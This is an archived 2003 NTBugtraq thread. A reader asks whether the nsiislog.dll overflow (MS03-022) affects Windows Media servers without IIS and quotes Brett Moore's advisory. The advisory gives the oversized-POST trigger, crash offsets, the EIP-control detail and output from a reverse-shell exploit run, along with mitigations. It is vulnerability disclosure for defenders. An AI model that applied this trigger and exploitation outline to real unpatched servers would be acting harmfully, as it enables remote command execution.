Re: Windows Media Services Remote Command Execution #2
From: Jim Winchell (jcwinchell_at_AOL.COM)
Date: 06/26/03
- Previous message: Brad Corob: "MS03-021 (819639) Patch Misinformation"
- Next in thread: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Reply: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 26 Jun 2003 11:03:01 -0400 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Windows Media Server doesn't require IIS to be installed. IIS can be installed on the same machine, but in that case, either Windows Media or IIS have to be configured to use a different port for http since they can't both share port 80.
Windows Media uses it's own built-in web server (Cougar) for streaming http traffic rather than IIS. If IIS isn't installed, the /scripts directory doesn't exist and nsiislog.dll is instead installed in %windir%\system32\Windows Media\Server.
Can you confirm whether or not this affects Windows Media Servers that don't running IIS or can nsiislog.dll still be exploited?
Thanks,
Jim Winchell
Brett Moore wrote:
> ========================================================================
> = Windows Media Services Remote Command Execution #2
> =
> = brett.moore@security-assessment.com
> = http://www.security-assessment.com
> =
> = MS Bulletin posted: June 25, 2003
> = http://www.microsoft.com/technet/security/bulletin/MS03-022.asp
> =
> = Affected Software:
> = Microsoft Windows 2000
> =
> = Public disclosure on June 25, 2003
> =========================================================================
> = Our Rating: Due to the ease of exploitation of this vulnerability and
> = the fact that it allows command execution against a vulnerable server
> = we feel that this patch is CRITICAL for all servers that have the
> = vulnerable dll installed even if Windows Media Services are not in use.
> =========================================================================
>
> A short time after a long time ago, in a place very similar to the last,
> where the sun shines, the snow falls and the water is still clean....
>
> Continuing with our 'Methodical Approach To Finding Overflows' against
> nsiislog.dll we discovered another issue but due to complications this
> fix was not released with the previous nsiislog.dll bulletin.
>
> == MS03-022 states ==
> Impact of vulnerability: Allow an attacker to execute code of their choice
> Maximum Severity Rating: Important
>
> There is a flaw in the way nsiislog.dll processes incoming client requests.
> A vulnerability exists because an attacker could send specially formed HTTP
> request (communications) to the server that could cause IIS to fail or
> execute code on the user's system.
> == MS03-022 ==
>
> == Description ==
>
> Sending a large standard post to nsiislog.dll will cause an access
> violation resulting in the following error log.
>
> ------------------------------------------------------------------------
> Event Type: Warning
> Event Source: W3SVC
> Event Category: None
> Event ID: 37
> Description:
> Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
> ------------------------------------------------------------------------
>
> This results in a standard stack based overflow, resulting in EIP
> been set to an arbitrary value allowing for remote command execution
> with privileges associated with the IWAM_machinename account.
>
> == Standard HTTP Post ==
>
> POST /scripts/nsiislog.dll HTTP/1.1
> content-length: <postlength>
>
> <post data>
>
> Using Size: 4354
> Connecting....Sending Buffer....
> 78028E9F mov al,byte ptr [esi] ESI = 00B138B4
>
> Using Size: 5000
> Connecting....Sending Buffer....
> 40F01F3B repne scas byte ptr [edi] EDI = 58585858
>
> Using Size: 25000
> Connecting....Sending Buffer....
> 78005994 mov dword ptr [edi],edx EDX = 58585858
> -
> 58585858 ??? illegal op EIP = 58585858
>
> == Exploitation ==
>
> Commonly referred to as a stack based overflow, control is taken when the
> EIP is set to a value from the stack. Widely known and easily exploitable
> by using a call or jmp instruction or in the worst case a brute force
> technique of direct jumps.
>
> In this case control is taken when a value is obtained from the stack
> and then used in a direct call.
>
> 77FB98E1 mov ecx,dword ptr [ebp+18h]
> 77FB98E4 call ecx
>
> == Exploit Example ==
>
> %:\>exploit 192.168.1.63
> ** IISNSLOG.DLL - Remote Shell **
>
> . Calling Home: blackhole:2000
> . Shellcode Size: 322 bytes
> . Preparing Exploit Buffer......Ready
> . Starting Listener On Port: 2000
> . Connecting To Target
> . Sending Exploit......Exploit Sent
> . Connection Received
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
> C:\WINNT\system32>whoami
> IWAM_BLACKHOLE
> C:\WINNT\system32>
>
> == Solutions ==
>
> - Every day is a 0-day day on the Internet. Limiting the avenues of attack
> can be a key factor in reducing the risk to a web server. Programs such
> as secureIIS and URLscan should be setup to reduce the number of methods
> that can be used to send data to a server. Removing unnecessary services,
> files and isapi extensions reduces the number of listeners that data can
> be fed to limiting the number of vulnerabilities that a server is
> susceptible to.
> - Install the vendor supplied patch.
>
> == Credit ==
>
> Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
> Security-Assessment.com
>
> %-) viva Las Vegas!!
>
> == About Security-Assessment.com ==
>
> Security-Assessment.com is a leader in intrusion testing and security
> code review, and leads the world with SA-ISO, online ISO17799 compliance
> management solution. Security-Assessment.com is committed to security
> research and development, and its team have previously identified a
> number of vulnerabilities in public and private software vendors products.
>
> oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
> Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
>
> With a growth rate exceeding 110%, the TICSA security practitioner
> certification is one of the hottest IT credentials available. And now, for
> a limited time, you can save 33% off of the TICSA certification exam! To
> learn more about the TICSA certification, and to register as a TICSA
> candidate online, just go to
>
> http://www.trusecure.com/offer/s0100/
>
> oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
>
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
With a growth rate exceeding 110%, the TICSA security practitioner
certification is one of the hottest IT credentials available. And now, for
a limited time, you can save 33% off of the TICSA certification exam! To
learn more about the TICSA certification, and to register as a TICSA
candidate online, just go to
http://www.trusecure.com/offer/s0100/
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Previous message: Brad Corob: "MS03-021 (819639) Patch Misinformation"
- Next in thread: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Reply: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
